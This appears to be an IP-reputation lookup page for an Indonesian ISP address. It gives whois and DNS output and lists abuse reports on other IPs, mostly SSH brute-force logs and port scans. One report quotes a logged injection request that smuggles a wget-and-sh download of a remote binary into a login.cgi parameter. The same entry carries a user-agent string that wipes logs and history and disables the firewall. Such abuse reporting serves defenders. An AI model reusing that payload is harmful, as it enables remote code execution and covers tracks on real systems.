Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: Indonesia

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
% [whois.apnic.net]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

% Information related to '58.65.240.0 - 58.65.247.255'

% Abuse contact for '58.65.240.0 - 58.65.247.255' is 'abuse@isat.net.id'

inetnum:        58.65.240.0 - 58.65.247.255
netname:        ISATNET-ID
descr:          PT Insan Sarana Telematika
descr:          Internet Service Provider
descr:          DKI Jakarta
country:        ID
admin-c:        IH777-AP
tech-c:         FC448-AP
status:         ALLOCATED PORTABLE
remarks:        Send Spam&  Abuse report to: abuse@isat.net.id
mnt-by:         MNT-APJII-ID
mnt-lower:      MAINT-ID-ISATNET
mnt-routes:     MAINT-ID-ISATNET
mnt-irt:        IRT-ISATNET-ID
last-modified:  2011-05-16T07:42:01Z
source:         APNIC

irt:            IRT-ISATNET-ID
address:        PT.Insan Sarana Telematika
address:        Jl. U No.84A Kemanggisan
address:        Jakarta Barat - 11480
e-mail:         abuse@isat.net.id
abuse-mailbox:  abuse@isat.net.id
admin-c:        FC448-AP
tech-c:         SC1498-AP
auth:           # Filtered
mnt-by:         MAINT-ID-ISATNET
last-modified:  2026-03-09T15:38:42Z
source:         APNIC

role:           ISATNET HOSTMASTERS
address:        PT. Insan Sarana Telematika
address:        Jl. Daan Mogot 1 no.34, Grogol
address:        DKI Jakarta
country:        ID
phone:          +62-21-569-71156
fax-no:         +62-21-569-71156
e-mail:         support@isat.net.id
remarks:        spam and abuse report : abuse@isat.net.id
remarks:        technical and routing : support@isat.net.id
admin-c:        SC1498-AP
tech-c:         KG168-AP
nic-hdl:        IH777-AP
remarks:        ISATNET Hostmasters Role Object
notify:         support@isat.net.id
mnt-by:         MAINT-ID-ISATNET
last-modified:  2011-05-05T10:32:02Z
source:         APNIC

person:         Fredy Candra
address:        PT Insan Sarana Telematika
address:        Jl. Daan Mogot 1 no.34, Grogol
address:        DKI Jakarta
country:        ID
phone:          +62-21-564-3233
fax-no:         +62-21-569-71172
e-mail:         fredy@isat.net.id
nic-hdl:        FC448-AP
mnt-by:         MAINT-ID-ISATNET
last-modified:  2011-05-05T09:52:00Z
source:         APNIC

% Information related to '58.65.241.0/24AS24535'

route:          58.65.241.0/24
descr:          Route object of ISATNET
descr:          ISP
descr:          Jakarta
origin:         AS24535
country:        ID
mnt-by:         MAINT-ID-ISATNET
last-modified:  2011-08-05T02:47:23Z
source:         APNIC

% Information related to '58.65.241.0 - 58.65.241.255'

inetnum:        58.65.241.0 - 58.65.241.255
netname:        ISATNET-3G-CORPORATE
country:        ID
descr:          ISATNET 3G CORPORATE
descr:          MOBILE USER
admin-c:        FC448-AP
tech-c:         IH777-AP
status:         ASSIGNED NON-PORTABLE
mnt-by:         MAINT-ID-ISATNET
last-modified:  2008-09-04T07:22:10Z
source:         IDNIC

role:           ISATNET HOSTMASTERS
address:        PT. Insan Sarana Telematika
address:        Jl. Daan Mogot 1 no.34, Grogol
address:        DKI Jakarta
country:        ID
phone:          +62-21-569-71156
fax-no:         +62-21-569-71156
e-mail:         support@isat.net.id
remarks:        spam and abuse report : abuse@isat.net.id
remarks:        technical and routing : support@isat.net.id
admin-c:        SC1498-AP
tech-c:         KG168-AP
nic-hdl:        IH777-AP
remarks:        ISATNET Hostmasters Role Object
notify:         support@isat.net.id
mnt-by:         MAINT-ID-ISATNET
last-modified:  2011-05-05T10:32:02Z
source:         IDNIC

person:         Fredy Candra
address:        PT Insan Sarana Telematika
address:        Jl. Daan Mogot 1 no.34, Grogol
address:        DKI Jakarta
country:        ID
phone:          +62-21-564-3233
fax-no:         +62-21-569-71172
e-mail:         fredy@isat.net.id
nic-hdl:        FC448-AP
mnt-by:         MAINT-ID-ISATNET
last-modified:  2011-05-05T09:52:00Z
source:         IDNIC

% Information related to '58.65.241.0/24AS24535'

route:          58.65.241.0/24
descr:          Route object of ISATNET
descr:          ISP
descr:          Jakarta
origin:         AS24535
country:        ID
mnt-by:         MAINT-ID-ISATNET
last-modified:  2011-08-05T02:47:23Z
source:         IDNIC

% This query was served by the APNIC Whois Service version 1.88.36-SNAPSHOT (WHOIS-AU5)
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 58.65.241.173
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 38767
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;58.65.241.173.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2026031602 1800 900 604800 86400

;; Query time: 6 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Mar 17 09:00:12 CST 2026
;; MSG SIZE  rcvd: 106
Host info
173.241.65.58.in-addr.arpa domain name pointer smtp.isat.net.id.
173.241.65.58.in-addr.arpa domain name pointer mail.isat.net.id.
173.241.65.58.in-addr.arpa domain name pointer smtp.multitech-infomedia.co.id.
173.241.65.58.in-addr.arpa domain name pointer mail.multitech-infomedia.co.id.
173.241.65.58.in-addr.arpa domain name pointer hosting.multitech-infomedia.co.id.
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
173.241.65.58.in-addr.arpa	name = mail.isat.net.id.
173.241.65.58.in-addr.arpa	name = smtp.isat.net.id.
173.241.65.58.in-addr.arpa	name = mail.multitech-infomedia.co.id.
173.241.65.58.in-addr.arpa	name = hosting.multitech-infomedia.co.id.
173.241.65.58.in-addr.arpa	name = smtp.multitech-infomedia.co.id.

Authoritative answers can be found from:
Related IP info:
Related comments:
IP Type Details Datetime
162.247.74.217 attackbotsspam
Unauthorized access detected from banned ip
2019-07-17 11:14:36
117.40.188.142 attackbots
May  4 05:35:55 server sshd\[71351\]: Invalid user anna from 117.40.188.142
May  4 05:35:55 server sshd\[71351\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.40.188.142
May  4 05:35:57 server sshd\[71351\]: Failed password for invalid user anna from 117.40.188.142 port 65384 ssh2
...
2019-07-17 11:31:03
117.247.191.18 attackbots
Jun 25 03:03:54 server sshd\[131845\]: Invalid user solr from 117.247.191.18
Jun 25 03:03:54 server sshd\[131845\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.247.191.18
Jun 25 03:03:56 server sshd\[131845\]: Failed password for invalid user solr from 117.247.191.18 port 38676 ssh2
...
2019-07-17 11:39:29
106.12.215.87 attackbots
106.12.215.87 - - [16/Jul/2019:23:03:55 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.203.234/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 166 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
...
2019-07-17 11:14:20
117.239.242.106 attack
Jun  8 23:30:35 server sshd\[92373\]: Invalid user design from 117.239.242.106
Jun  8 23:30:35 server sshd\[92373\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.239.242.106
Jun  8 23:30:36 server sshd\[92373\]: Failed password for invalid user design from 117.239.242.106 port 38966 ssh2
...
2019-07-17 11:41:47
118.163.107.56 attackbotsspam
Jul 16 23:18:13 sshgateway sshd\[15644\]: Invalid user ftptest from 118.163.107.56
Jul 16 23:18:13 sshgateway sshd\[15644\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.163.107.56
Jul 16 23:18:15 sshgateway sshd\[15644\]: Failed password for invalid user ftptest from 118.163.107.56 port 57868 ssh2
2019-07-17 11:11:42
116.62.217.151 attackbots
16.07.2019 22:00:40 Recursive DNS scan
2019-07-17 11:08:03
104.152.52.36 attackbotsspam
Jul 17 00:04:59 mail kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00:50:56:3c:4d:20:28:99:3a:4d:23:91:08:00 SRC=104.152.52.36 DST=213.136.73.128 LEN=40 TOS=0x00 PREC=0x00 TTL=246 ID=63094 PROTO=TCP SPT=54699 DPT=6000 WINDOW=1024 RES=0x00 SYN URGP=0 
Jul 17 00:05:01 mail kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00:50:56:3c:4d:20:28:99:3a:4d:23:91:08:00 SRC=104.152.52.36 DST=213.136.73.128 LEN=40 TOS=0x00 PREC=0x00 TTL=246 ID=990 PROTO=TCP SPT=54699 DPT=8009 WINDOW=1024 RES=0x00 SYN URGP=0 
Jul 17 00:05:02 mail kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00:50:56:3c:4d:20:28:99:3a:4d:23:91:08:00 SRC=104.152.52.36 DST=213.136.73.128 LEN=40 TOS=0x00 PREC=0x00 TTL=246 ID=4075 PROTO=TCP SPT=54699 DPT=138 WINDOW=1024 RES=0x00 SYN URGP=0 
Jul 17 00:05:02 mail kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00:50:56:3c:4d:20:28:99:3a:4d:23:91:08:00 SRC=104.152.52.36 DST=213.136.73.128 LEN=40 TOS=0x00 PREC=0x00 TTL=246 ID=46767 PROTO=TCP SPT=54699 DPT=8172 WINDOW=1024 RES=0x00 SYN URGP=0 
Jul 17 00:05:02 mail kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00
2019-07-17 11:18:52
117.36.53.108 attack
May 13 17:59:10 server sshd\[165237\]: Invalid user butter from 117.36.53.108
May 13 17:59:10 server sshd\[165237\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.36.53.108
May 13 17:59:12 server sshd\[165237\]: Failed password for invalid user butter from 117.36.53.108 port 22885 ssh2
...
2019-07-17 11:31:35
117.255.216.116 attackbots
May  5 03:15:55 server sshd\[104758\]: Invalid user vmadmin from 117.255.216.116
May  5 03:15:55 server sshd\[104758\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.255.216.116
May  5 03:15:56 server sshd\[104758\]: Failed password for invalid user vmadmin from 117.255.216.116 port 48952 ssh2
...
2019-07-17 11:36:02
180.250.162.9 attack
16.07.2019 22:16:35 SSH access blocked by firewall
2019-07-17 11:19:35
50.236.62.30 attack
2019-07-17T03:09:05.097000abusebot-7.cloudsearch.cf sshd\[13737\]: Invalid user teamspeak from 50.236.62.30 port 53380
2019-07-17 11:35:07
181.115.181.198 attackspam
Automatic report - Port Scan Attack
2019-07-17 11:32:00
117.60.61.236 attackbots
Apr 20 19:47:49 server sshd\[230798\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.60.61.236  user=root
Apr 20 19:47:51 server sshd\[230798\]: Failed password for root from 117.60.61.236 port 2418 ssh2
Apr 20 19:48:03 server sshd\[230798\]: Failed password for root from 117.60.61.236 port 2418 ssh2
...
2019-07-17 11:21:55
178.46.211.84 attack
Honeypot attack, port: 23, PTR: PTR record not found
2019-07-17 11:33:51

Recently Reported IPs

10.10.3.164 110.190.36.131 80.17.174.250 103.151.172.30
201.106.144.40 217.76.52.30 170.130.204.2 232.37.222.195
198.18.0.14 34.116.184.202 35.166.75.253 20.253.66.3
101.67.49.39 62.60.131.176 81.20.32.84 159.223.155.62
60.16.197.79 34.61.82.184 182.119.229.226 10.90.31.73